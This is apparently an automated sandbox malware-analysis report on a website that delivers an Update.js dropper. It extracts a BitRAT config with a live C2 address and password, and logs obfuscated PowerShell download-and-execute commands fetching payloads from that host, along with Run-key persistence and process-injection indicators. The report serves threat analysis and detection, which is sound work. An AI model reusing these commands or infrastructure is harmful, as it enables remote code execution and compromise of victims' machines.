Analysis
max time kernel: 148s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240412-en locale:en-us os:windows10-2004-x64 system
submitted: 23-04-2024 15:27

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://ommcreation.in
Resource: win10v2004-20240412-en

General
Target: https://ommcreation.in

Malware Config
Extracted: http://77.221.151.31/a/z.png
Extracted: http://77.221.151.31/a/s.png
Extracted:
  bitrat
  1.38
  77.221.151.31:4444
  communication_password: 7b13ff385b95cf25d53088d6b7c5d890
  tor_process: tor
Signatures
Blocklisted process makes network request 6 IoCs
flow  pid   Process
111   3000  powershell.exe
112   5608  powershell.exe
117   5288  powershell.exe
118   5964  powershell.exe
119   5728  powershell.exe
120   5504  powershell.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                    Process
Key value queried  \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation  WScript.exe
Key value queried  \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation  WScript.exe
Key value queried  \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation  WScript.exe
Adds Run key to start application 2 TTPs 1 IoCs
description      ioc                                                                                                                                                                                      Process
Set value (str)  \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo"  powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid   Process
3872  RegSvcs.exe
3872  RegSvcs.exe
3872  RegSvcs.exe
3872  RegSvcs.exe
3872  RegSvcs.exe
6036  RegSvcs.exe
Suspicious use of SetThreadContext 2 IoCs
description                          pid   Process         procid_target
PID 5728 set thread context of 3872  5728  powershell.exe  160
PID 5964 set thread context of 6036  5964  powershell.exe  161
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry 2 TTPs 3 IoCs
description        ioc                                                             Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS              msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Modifies registry class 1 IoCs
description  ioc                                                                                Process
Key created  \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings  msedge.exe
Suspicious behavior: EnumeratesProcesses 60 IoCs
pid   Process
1532  msedge.exe
1532  msedge.exe
884   msedge.exe
884   msedge.exe
3996  identity_helper.exe
3996  identity_helper.exe
5512  msedge.exe
5512  msedge.exe
5872  msedge.exe
5872  msedge.exe
5928  msedge.exe
5928  msedge.exe
3000  powershell.exe
3000  powershell.exe
5608  powershell.exe
5608  powershell.exe
5608  powershell.exe
3000  powershell.exe
5964  powershell.exe
5964  powershell.exe
5288  powershell.exe
5288  powershell.exe
5964  powershell.exe
5288  powershell.exe
5728  powershell.exe
5728  powershell.exe
5504  powershell.exe
5504  powershell.exe
5728  powershell.exe
5504  powershell.exe
6076  msedge.exe
6076  msedge.exe
5936  msedge.exe
5936  msedge.exe
5284  msedge.exe
5284  msedge.exe
5336  msedge.exe
5336  msedge.exe
3032  msedge.exe
3032  msedge.exe
1388  msedge.exe
1388  msedge.exe
5656  msedge.exe
5656  msedge.exe
5892  msedge.exe
5892  msedge.exe
5860  msedge.exe
5860  msedge.exe
6080  msedge.exe
6080  msedge.exe
2972  msedge.exe
2972  msedge.exe
6044  msedge.exe
6044  msedge.exe
1428  msedge.exe
1428  msedge.exe
3892  msedge.exe
3892  msedge.exe
3892  msedge.exe
3892  msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
pid  Process
884  msedge.exe  (identical row repeated for each of the 29 IoCs)
Suspicious use of AdjustPrivilegeToken 13 IoCs
description                      pid   Process
Token: SeDebugPrivilege          3000  powershell.exe
Token: SeDebugPrivilege          5608  powershell.exe
Token: SeDebugPrivilege          5964  powershell.exe
Token: SeDebugPrivilege          5288  powershell.exe
Token: SeDebugPrivilege          5728  powershell.exe
Token: SeDebugPrivilege          5504  powershell.exe
Token: SeShutdownPrivilege       3872  RegSvcs.exe
Token: SeShutdownPrivilege       6036  RegSvcs.exe
Token: SeBackupPrivilege         3024  svchost.exe
Token: SeRestorePrivilege        3024  svchost.exe
Token: SeSecurityPrivilege       3024  svchost.exe
Token: SeTakeOwnershipPrivilege  3024  svchost.exe
Token: 35                        3024  svchost.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid  Process
884  msedge.exe  (identical row repeated for each of the 64 IoCs)
Suspicious use of SendNotifyMessage 24 IoCs
pid  Process
884  msedge.exe  (identical row repeated for each of the 24 IoCs)
Suspicious use of SetWindowsHookEx 2 IoCs
pid   Process
3872  RegSvcs.exe
3872  RegSvcs.exe
Suspicious use of WriteProcessMemory 64 IoCs
description                      pid  Process     procid_target
PID 884 wrote to memory of 3524  884  msedge.exe  86  (row repeated)
PID 884 wrote to memory of 4216  884  msedge.exe  87  (row repeated)
PID 884 wrote to memory of 1532  884  msedge.exe  88  (row repeated)
PID 884 wrote to memory of 3220  884  msedge.exe  89  (row repeated)
(identical rows collapsed; 64 IoCs in total, all writes by PID 884 into its own child processes)
Views/modifies file attributes 1 TTPs 3 IoCs
pid   Process
5716  attrib.exe
5940  attrib.exe
5044  attrib.exe
Processes

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ommcreation.in
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:884

Child processes of PID 884:

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde1ca46f8,0x7ffde1ca4708,0x7ffde1ca4718
  PID:3524

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
  PID:4216

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
  PID:1532

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
  PID:3220

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  PID:3528

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  PID:2612

  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
  PID:2568

  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:3996

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
  PID:5136

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  PID:5244

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
  PID:5264

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
  PID:5320

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  PID:5396

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6272 /prefetch:8
  PID:5492

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
  PID:5500

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5512

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
  PID:5520

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:1
  PID:5612

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
  PID:5860

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5872

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5928

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
  PID:5336

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
  PID:5344

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
  PID:5932

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  PID:6016

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
  PID:6088

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6812 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:6076

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5936

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5284

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
  PID:5536

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
  PID:2176

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2244 /prefetch:1
  PID:5416

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
  PID:4976

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6912 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5336

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:1
  PID:1936

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
  PID:5880

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
  PID:5296

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:1
  PID:6072

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:3032

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
  PID:4816

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
  PID:4392

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1
  PID:2424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵PID:5788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:12⤵PID:3288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7088 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6120 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6288 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1716 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4076554086568624311,17710944738743832323,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6332 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3892
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3852
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2080
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4944
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Update (2).zip\Update.js"1⤵
- Checks computer location settings
PID:5316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5608 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log3⤵PID:5688
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Public\0x.log4⤵
- Views/modifies file attributes
PID:5716
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Update (2).zip\Update.js"1⤵
- Checks computer location settings
PID:5224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5964 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log3⤵PID:5896
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Public\0x.log4⤵
- Views/modifies file attributes
PID:5940
-
-
-
